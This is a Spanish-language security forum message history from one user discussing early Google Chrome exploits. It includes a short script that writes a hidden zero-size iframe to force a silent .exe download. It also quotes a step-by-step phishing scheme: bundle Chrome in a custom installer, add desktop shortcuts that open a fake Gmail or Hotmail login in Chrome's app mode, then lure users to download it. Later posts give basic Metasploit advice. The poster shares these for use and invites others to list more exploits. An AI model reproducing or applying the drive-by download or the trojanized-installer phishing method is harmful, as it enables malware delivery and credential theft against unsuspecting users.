Mensajes

Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC



-berz3k.

@WHK

En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..

-berz3k.

PD: Cambie el nombre del topic inicial, para mejorar el tema.

-berz3k.

[Browser Automatic File Download]

Browser Automatic File Download

Exploit:

Código [Seleccionar] Expandir


<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>



Alguien mas? exploits diferentes a los posteados? hagamos una lista XD

fuente: securiteam.com

-berz3k.

[Otro PoC en shortcuts de Win32]

Otro PoC en shortcuts de Win32

Have you installed the new Google chrome? Make sure you're careful with your application shortcuts because I just thought of a very easy way to Phish basic users.

Código [Seleccionar] Expandir



   1. Wrap the Chrome browser installation in your own InstallShield.
   2. Create a Phising Mirror of Gmail or what ever site you want to Phish.
   3. Add Desktop Shortcuts to the InstallShield which link to.
      "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"  --app=http://login.live..yourfakehotmailwebsite.com
   4. Build your InstallShield.
   5. Stick a graphic on your website that says "Get Google Chrome Now" and link to your InstallShield build.



When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account.

As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail.

fuente
:http://www.thewayithink.co.uk/post/Security-Vulnerability-with-Google-Chrome.aspx

:http://evilfingers.com/advisory/google_chrome_poc.php

-berz3k.

La page que posteas existen algunas tools interesantes para dejar de forma desatendida mediante barch algunos programs, muy buen link.

-berz3k.

@Zipp0 es una pregunta muy basica, para utilizar Metasploit Framework, antes lograste encontrar alguna vulnerabilidad, aunque no necesariamente, el GUI de Metasploit ya trae muchas tools incluidas para realizar alguna tipo de scanneo "ports scan" "backshell" "shellcodes", etc, data una vuelta por la pagina de Metasploit y leete un poco el manual.

-berz3k.

["Online Update"]

Se pueden agregar mas exploits, cuando te bajas la ultima version de Metasploit Framework y realizas un "Online Update" tendras lo ultimo en exploits, obviamente algunos codes no los agregan como "oficiales" de Metasploit, para ello tendras que agregarlos manualmente y/o programarlos.

-berz3k.

Agregas tu mail y donde dice "Darme de alta - Suscribirse" le das "click" y listo

-berz3k.